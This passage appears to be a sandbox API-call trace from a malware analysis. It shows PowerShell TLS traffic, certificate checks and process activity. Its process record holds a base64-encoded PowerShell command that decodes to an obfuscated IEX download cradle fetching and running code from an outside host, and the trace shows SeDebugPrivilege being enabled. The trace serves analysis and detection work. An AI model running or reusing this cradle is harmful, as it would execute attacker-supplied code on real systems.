	[0789.327] AcquireCredentialsHandleW (in: pPrincipal=0x0, pPackage=0x2dc5760, fCredentialUse=0x2, pvLogonId=0x0, pAuthData=0x1c85d048, pGetKeyFn=0x0, pvGetKeyArgument=0x0, phCredential=0x1c85d038, ptsExpiry=0x1c85d030 | out: phCredential=0x1c85d038, ptsExpiry=0x1c85d030) returned 0x0
	[0789.334] InitializeSecurityContextW (in: phCredential=0x1c85d240, phContext=0x0, pTargetName=0x2dba180, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x1c85d230, pOutput=0x2dc7ea8, pfContextAttr=0x1c85d228, ptsExpiry=0x1c85d220 | out: phNewContext=0x1c85d230, pOutput=0x2dc7ea8, pfContextAttr=0x1c85d228, ptsExpiry=0x1c85d220) returned 0x90312
	[0789.337] FreeContextBuffer (in: pvContextBuffer=0x1b3cc490 | out: pvContextBuffer=0x1b3cc490) returned 0x0
	[0804.186] send (s=0x4a0, buf=0x2dc7f78*, len=118, flags=0) returned 118
	[0804.187] recv (in: s=0x4a0, buf=0x2dc7f78, len=5, flags=0 | out: buf=0x2dc7f78*) returned 5
	[0804.278] recv (in: s=0x4a0, buf=0x2dc7f7d, len=93, flags=0 | out: buf=0x2dc7f7d*) returned 93
	[0804.279] InitializeSecurityContextW (in: phCredential=0x1c85d160, phContext=0x1c85d410, pTargetName=0x2dba180, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2dc8288, Reserved2=0x0, phNewContext=0x1c85d150, pOutput=0x2dc82a8, pfContextAttr=0x1c85d148, ptsExpiry=0x1c85d140 | out: phNewContext=0x1c85d150, pOutput=0x2dc82a8, pfContextAttr=0x1c85d148, ptsExpiry=0x1c85d140) returned 0x90312
	[0804.293] recv (in: s=0x4a0, buf=0x2dc8398, len=5, flags=0 | out: buf=0x2dc8398*) returned 5
	[0804.293] recv (in: s=0x4a0, buf=0x2dc83bd, len=2556, flags=0 | out: buf=0x2dc83bd*) returned 2556
	[0804.293] InitializeSecurityContextW (in: phCredential=0x1c85d090, phContext=0x1c85d340, pTargetName=0x2dba180, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2dc8e90, Reserved2=0x0, phNewContext=0x1c85d080, pOutput=0x2dc8eb0, pfContextAttr=0x1c85d078, ptsExpiry=0x1c85d070 | out: phNewContext=0x1c85d080, pOutput=0x2dc8eb0, pfContextAttr=0x1c85d078, ptsExpiry=0x1c85d070) returned 0x90312
	[0804.296] recv (in: s=0x4a0, buf=0x2dc8fa0, len=5, flags=0 | out: buf=0x2dc8fa0*) returned 5
	[0804.296] recv (in: s=0x4a0, buf=0x2dc8fc5, len=331, flags=0 | out: buf=0x2dc8fc5*) returned 331
	[0804.296] InitializeSecurityContextW (in: phCredential=0x1c85cfc0, phContext=0x1c85d270, pTargetName=0x2dba180, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2dc91e0, Reserved2=0x0, phNewContext=0x1c85cfb0, pOutput=0x2dc9200, pfContextAttr=0x1c85cfa8, ptsExpiry=0x1c85cfa0 | out: phNewContext=0x1c85cfb0, pOutput=0x2dc9200, pfContextAttr=0x1c85cfa8, ptsExpiry=0x1c85cfa0) returned 0x90312
	[0804.319] recv (in: s=0x4a0, buf=0x2dc92f0, len=5, flags=0 | out: buf=0x2dc92f0*) returned 5
	[0804.320] recv (in: s=0x4a0, buf=0x2dc9315, len=4, flags=0 | out: buf=0x2dc9315*) returned 4
	[0804.320] InitializeSecurityContextW (in: phCredential=0x1c85cef0, phContext=0x1c85d1a0, pTargetName=0x2dba180, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2dc93f0, Reserved2=0x0, phNewContext=0x1c85cee0, pOutput=0x2dc9410, pfContextAttr=0x1c85ced8, ptsExpiry=0x1c85ced0 | out: phNewContext=0x1c85cee0, pOutput=0x2dc9410, pfContextAttr=0x1c85ced8, ptsExpiry=0x1c85ced0) returned 0x90312
	[0804.377] FreeContextBuffer (in: pvContextBuffer=0x1b3c7f90 | out: pvContextBuffer=0x1b3c7f90) returned 0x0
	[0804.377] send (s=0x4a0, buf=0x2dc94e0*, len=134, flags=0) returned 134
	[0804.377] recv (in: s=0x4a0, buf=0x2dc94e0, len=5, flags=0 | out: buf=0x2dc94e0*) returned 5
	[0804.475] recv (in: s=0x4a0, buf=0x2dc94e5, len=1, flags=0 | out: buf=0x2dc94e5*) returned 1
	[0804.475] InitializeSecurityContextW (in: phCredential=0x1c85ce20, phContext=0x1c85d0d0, pTargetName=0x2dba180, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2dc9658, Reserved2=0x0, phNewContext=0x1c85ce10, pOutput=0x2dc9678, pfContextAttr=0x1c85ce08, ptsExpiry=0x1c85ce00 | out: phNewContext=0x1c85ce10, pOutput=0x2dc9678, pfContextAttr=0x1c85ce08, ptsExpiry=0x1c85ce00) returned 0x90312
	[0804.476] recv (in: s=0x4a0, buf=0x2dc9768, len=5, flags=0 | out: buf=0x2dc9768*) returned 5
	[0804.476] recv (in: s=0x4a0, buf=0x2dc978d, len=48, flags=0 | out: buf=0x2dc978d*) returned 48
	[0804.476] InitializeSecurityContextW (in: phCredential=0x1c85cd50, phContext=0x1c85d000, pTargetName=0x2dba180, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2dc9890, Reserved2=0x0, phNewContext=0x1c85cd40, pOutput=0x2dc98b0, pfContextAttr=0x1c85cd38, ptsExpiry=0x1c85cd30 | out: phNewContext=0x1c85cd40, pOutput=0x2dc98b0, pfContextAttr=0x1c85cd38, ptsExpiry=0x1c85cd30) returned 0x0
	[0805.203] QueryContextAttributesW (in: phContext=0x1c85cfb0, ulAttribute=0x4, pBuffer=0x2dc99c8 | out: pBuffer=0x2dc99c8) returned 0x0
	[0807.000] QueryContextAttributesW (in: phContext=0x1c85cfb0, ulAttribute=0x5a, pBuffer=0x2dc9a48 | out: pBuffer=0x2dc9a48) returned 0x0
	[0807.010] QueryContextAttributesW (in: phContext=0x1c85ce60, ulAttribute=0x53, pBuffer=0x2dc9d98 | out: pBuffer=0x2dc9d98) returned 0x0
	[0812.099] CertDuplicateCRLContext (pCrlContext=0x1b3c6350) returned 0x1b3c6350
	[0812.102] CertDuplicateStore (hCertStore=0x3d1c80) returned 0x3d1c80
	[0812.103] CertEnumCertificatesInStore (hCertStore=0x3d1c80, pPrevCertContext=0x0) returned 0x1b3c63d0
	[0812.103] CertDuplicateCRLContext (pCrlContext=0x1b3c63d0) returned 0x1b3c63d0
	[0812.104] CertEnumCertificatesInStore (hCertStore=0x3d1c80, pPrevCertContext=0x1b3c63d0) returned 0x1b3c6350
	[0812.104] CertDuplicateCRLContext (pCrlContext=0x1b3c6350) returned 0x1b3c6350
	[0812.104] CertEnumCertificatesInStore (hCertStore=0x3d1c80, pPrevCertContext=0x1b3c6350) returned 0x0
	[0812.104] CertCloseStore (hCertStore=0x3d1c80, dwFlags=0x0) returned 1
	[0812.104] CertFreeCRLContext (pCrlContext=0x1b3c6350) returned 1
	[0812.121] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x3d1bb0
	[0812.122] CertAddCRLLinkToStore (in: hCertStore=0x3d1bb0, pCrlContext=0x1b3c63d0, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0814.315] CertAddCRLLinkToStore (in: hCertStore=0x3d1bb0, pCrlContext=0x1b3c6350, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0827.346] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x1b3c6350, pTime=0x1c85ce68, hAdditionalStore=0x3d1bb0, pChainPara=0x1c85ce70, dwFlags=0x0, pvReserved=0x0, ppChainContext=0x1c85ce60 | out: ppChainContext=0x1c85ce60) returned 1
	[0851.399] CertDuplicateCertificateChain (pChainContext=0x1ce239e0) returned 0x1ce239e0
	[0851.401] CertDuplicateCRLContext (pCrlContext=0x1b3c6350) returned 0x1b3c6350
	[0851.401] CertDuplicateCRLContext (pCrlContext=0x1ce6b9f0) returned 0x1ce6b9f0
	[0851.401] CertDuplicateCRLContext (pCrlContext=0x1ce6ba70) returned 0x1ce6ba70
	[0851.401] CertFreeCertificateChain (pChainContext=0x1ce239e0) 
	[0851.402] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x1ce239e0, pPolicyPara=0x1c85cfe8, pPolicyStatus=0x1c85cfc8 | out: pPolicyStatus=0x1c85cfc8) returned 1
	[0851.403] SetLastError (dwErrCode=0x0) 
	[0853.062] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x1ce239e0, pPolicyPara=0x1c85d0c0, pPolicyStatus=0x1c85d0a8 | out: pPolicyStatus=0x1c85d0a8) returned 1
	[0857.420] CertFreeCertificateChain (pChainContext=0x1ce239e0) 
	[0857.420] CertFreeCRLContext (pCrlContext=0x1b3c6350) returned 1
	[0858.428] EncryptMessage (in: phContext=0x1c85d670, fQOP=0x0, pMessage=0x2dcc688, MessageSeqNo=0x0 | out: pMessage=0x2dcc688) returned 0x0
	[0858.428] send (s=0x4a0, buf=0x2dcc3c8*, len=117, flags=0) returned 117
	[0859.833] setsockopt (s=0x4a0, level=65535, optname=4102, optval="\xa0\x86\x01", optlen=4) returned 0
	[0859.834] recv (in: s=0x4a0, buf=0x2dcc7e8, len=5, flags=0 | out: buf=0x2dcc7e8) returned -1
	[0859.835] WSAEventSelect (s=0x4a0, hEventObject=0x0, lNetworkEvents=0) returned 0
	[0859.835] CoTaskMemAlloc (cb=0x204) returned 0x3bb470
	[0859.835] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2745, dwLanguageId=0x0, lpBuffer=0x3bb470, nSize=0x101, Arguments=0x0 | out: lpBuffer="An established connection was aborted by the software in your host machine.\r\n") returned 0x4d
	[0859.835] CoTaskMemFree (pv=0x3bb470) 
	[0918.260] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c8590c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0918.260] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c859010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0918.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c859010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0918.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c859010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0918.286] CryptAcquireContextA (in: phProv=0x1c857c88, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000020 | out: phProv=0x1c857c88*=0x1b3997e0) returned 1
	[0925.310] CoTaskMemAlloc (cb=0x104) returned 0x1b39e640
	[0925.310] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39e640, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0925.310] CoTaskMemFree (pv=0x1b39e640) 

Thread:
	id = 1497
	os_tid = 0x8f4


Thread:
	id = 1508
	os_tid = 0x1d50


Thread:
	id = 1523
	os_tid = 0x1d30

	[0749.557] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0750.926] ResetEvent (hEvent=0x36c) returned 1
	[0857.584] GetSystemInfo (in: lpSystemInfo=0x1cb2d9f0 | out: lpSystemInfo=0x1cb2d9f0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0905.410] CoUninitialize () 

Thread:
	id = 1717
	os_tid = 0x2060


Thread:
	id = 1767
	os_tid = 0x1a4c


Thread:
	id = 1848
	os_tid = 0x2468

	[0861.468] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0891.537] QueryContextAttributesW (in: phContext=0x228eb10, ulAttribute=0x1a, pBuffer=0x228ec90 | out: pBuffer=0x228ec90) returned 0x0
	[0905.426] DeleteSecurityContext (phContext=0x228e2e0) returned 0x0
	[0906.751] shutdown (s=0x4a0, how=2) returned 0
	[0906.752] setsockopt (s=0x4a0, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0906.752] closesocket (s=0x4a0) returned 0

Process:
	id = "62"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x7533d000"
	os_pid = "0xf44"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 312
	os_tid = 0xf48

	[0686.136] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0699.809] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0699.809] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0699.809] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0699.809] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0718.891] GetVersionExW (in: lpVersionInformation=0x24ddc0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x24ddc0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0718.893] GetVersionExW (in: lpVersionInformation=0x24ddc0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x24ddc0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0720.570] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0720.577] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24da80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0720.577] GetVersionExW (in: lpVersionInformation=0x24db30*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x24db30*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0720.578] SetErrorMode (uMode=0x1) returned 0x1
	[0720.579] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x24dc90 | out: lpFileInformation=0x24dc90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0720.580] SetErrorMode (uMode=0x1) returned 0x1
	[0720.583] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x24df00 | out: lpdwHandle=0x24df00) returned 0x94c
	[0720.586] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2cc72f0 | out: lpData=0x2cc72f0) returned 1
	[0720.588] VerQueryValueW (in: pBlock=0x2cc72f0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x24de78, puLen=0x24de70 | out: lplpBuffer=0x24de78*=0x2cc738c, puLen=0x24de70) returned 1
	[0720.591] lstrlenW (lpString="䅁") returned 1
	[0720.601] VerQueryValueW (in: pBlock=0x2cc72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x24dde8, puLen=0x24dde0 | out: lplpBuffer=0x24dde8*=0x2cc7468, puLen=0x24dde0) returned 1
	[0720.602] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0720.604] CoTaskMemAlloc (cb=0x2e) returned 0x177380
	[0720.604] lstrcpyW (in: lpString1=0x177380, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0720.605] CoTaskMemFree (pv=0x177380) 
	[0720.605] VerQueryValueW (in: pBlock=0x2cc72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x24dde8, puLen=0x24dde0 | out: lplpBuffer=0x24dde8*=0x2cc74bc, puLen=0x24dde0) returned 1
	[0720.605] lstrlenW (lpString="System.Management.Automation") returned 28
	[0720.605] CoTaskMemAlloc (cb=0x3c) returned 0xb9860
	[0720.605] lstrcpyW (in: lpString1=0xb9860, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0720.605] CoTaskMemFree (pv=0xb9860) 
	[0720.605] VerQueryValueW (in: pBlock=0x2cc72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x24dde8, puLen=0x24dde0 | out: lplpBuffer=0x24dde8*=0x2cc7518, puLen=0x24dde0) returned 1
	[0720.605] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0720.605] CoTaskMemAlloc (cb=0x20) returned 0x175590
	[0720.605] lstrcpyW (in: lpString1=0x175590, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0720.606] CoTaskMemFree (pv=0x175590) 
	[0720.606] VerQueryValueW (in: pBlock=0x2cc72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x24dde8, puLen=0x24dde0 | out: lplpBuffer=0x24dde8*=0x2cc7558, puLen=0x24dde0) returned 1
	[0720.606] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0720.606] CoTaskMemAlloc (cb=0x44) returned 0xb9860
	[0720.606] lstrcpyW (in: lpString1=0xb9860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0720.606] CoTaskMemFree (pv=0xb9860) 
	[0720.606] VerQueryValueW (in: pBlock=0x2cc72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x24dde8, puLen=0x24dde0 | out: lplpBuffer=0x24dde8*=0x2cc75c0, puLen=0x24dde0) returned 1
	[0720.606] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0720.606] CoTaskMemAlloc (cb=0x76) returned 0x126db0
	[0720.606] lstrcpyW (in: lpString1=0x126db0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0720.606] CoTaskMemFree (pv=0x126db0) 
	[0720.606] VerQueryValueW (in: pBlock=0x2cc72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x24dde8, puLen=0x24dde0 | out: lplpBuffer=0x24dde8*=0x2cc765c, puLen=0x24dde0) returned 1
	[0720.606] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0720.606] CoTaskMemAlloc (cb=0x44) returned 0xb9860
	[0720.606] lstrcpyW (in: lpString1=0xb9860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0720.606] CoTaskMemFree (pv=0xb9860) 
	[0720.606] VerQueryValueW (in: pBlock=0x2cc72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x24dde8, puLen=0x24dde0 | out: lplpBuffer=0x24dde8*=0x2cc76c0, puLen=0x24dde0) returned 1
	[0720.606] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0720.606] CoTaskMemAlloc (cb=0x58) returned 0x14cbd0
	[0720.607] lstrcpyW (in: lpString1=0x14cbd0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0720.607] CoTaskMemFree (pv=0x14cbd0) 
	[0720.607] VerQueryValueW (in: pBlock=0x2cc72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x24dde8, puLen=0x24dde0 | out: lplpBuffer=0x24dde8*=0x2cc773c, puLen=0x24dde0) returned 1
	[0720.607] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0720.607] CoTaskMemAlloc (cb=0x20) returned 0x175590
	[0720.607] lstrcpyW (in: lpString1=0x175590, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0720.607] CoTaskMemFree (pv=0x175590) 
	[0720.607] VerQueryValueW (in: pBlock=0x2cc72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x24dde8, puLen=0x24dde0 | out: lplpBuffer=0x24dde8*=0x2cc73e4, puLen=0x24dde0) returned 1
	[0720.607] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0720.607] CoTaskMemAlloc (cb=0x66) returned 0xfc4b0
	[0720.607] lstrcpyW (in: lpString1=0xfc4b0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0720.607] CoTaskMemFree (pv=0xfc4b0) 
	[0720.607] VerQueryValueW (in: pBlock=0x2cc72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x24dde8, puLen=0x24dde0 | out: lplpBuffer=0x24dde8*=0x0, puLen=0x24dde0) returned 0
	[0720.607] VerQueryValueW (in: pBlock=0x2cc72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x24dde8, puLen=0x24dde0 | out: lplpBuffer=0x24dde8*=0x0, puLen=0x24dde0) returned 0
	[0720.607] VerQueryValueW (in: pBlock=0x2cc72f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x24dde8, puLen=0x24dde0 | out: lplpBuffer=0x24dde8*=0x0, puLen=0x24dde0) returned 0
	[0720.607] VerQueryValueW (in: pBlock=0x2cc72f0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x24ddb8, puLen=0x24ddb0 | out: lplpBuffer=0x24ddb8*=0x2cc738c, puLen=0x24ddb0) returned 1
	[0720.608] CoTaskMemAlloc (cb=0x204) returned 0x129a50
	[0720.609] VerLanguageNameW (in: wLang=0x0, szLang=0x129a50, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0722.190] CoTaskMemFree (pv=0x129a50) 
	[0722.191] VerQueryValueW (in: pBlock=0x2cc72f0, lpSubBlock="\\", lplpBuffer=0x24de08, puLen=0x24de00 | out: lplpBuffer=0x24de08*=0x2cc7318, puLen=0x24de00) returned 1
	[0722.196] GetCurrentProcessId () returned 0xf44
	[0722.215] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x24cd30 | out: lpLuid=0x24cd30*(LowPart=0x14, HighPart=0)) returned 1
	[0722.218] GetCurrentProcess () returned 0xffffffffffffffff
	[0722.219] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x24cd50 | out: TokenHandle=0x24cd50*=0x2e4) returned 1
	[0722.219] AdjustTokenPrivileges (in: TokenHandle=0x2e4, DisableAllPrivileges=0, NewState=0x2ccab68*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0722.221] CloseHandle (hObject=0x2e4) returned 1
	[0722.225] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xf44) returned 0x2e4
	[0723.689] EnumProcessModules (in: hProcess=0x2e4, lphModule=0x2ccabd0, cb=0x200, lpcbNeeded=0x24dd68 | out: lphModule=0x2ccabd0, lpcbNeeded=0x24dd68) returned 1
	[0723.692] GetModuleInformation (in: hProcess=0x2e4, hModule=0x13f370000, lpmodinfo=0x2ccae40, cb=0x18 | out: lpmodinfo=0x2ccae40*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0723.693] CoTaskMemAlloc (cb=0x804) returned 0x17f120
	[0723.693] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x13f370000, lpBaseName=0x17f120, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0723.693] CoTaskMemFree (pv=0x17f120) 
	[0723.694] CoTaskMemAlloc (cb=0x804) returned 0x17f120
